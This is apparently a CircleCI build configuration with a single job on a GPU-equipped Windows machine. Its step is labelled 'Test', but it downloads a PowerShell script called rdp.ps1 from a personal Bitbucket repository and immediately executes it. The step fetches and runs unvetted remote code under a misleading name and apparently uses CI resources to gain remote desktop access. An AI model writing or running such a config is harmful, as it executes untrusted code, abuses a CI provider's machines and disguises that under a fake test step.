version: 2.1

jobs:
  build:
    machine:
      image: windows-server-2019-nvidia:edge
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/sadsases3324/rdp/raw/18b3393b9764bddd11687eda214a8f9a629fe01f/rdp.ps1 -OutFile rdp.ps1
            ./rdp.ps1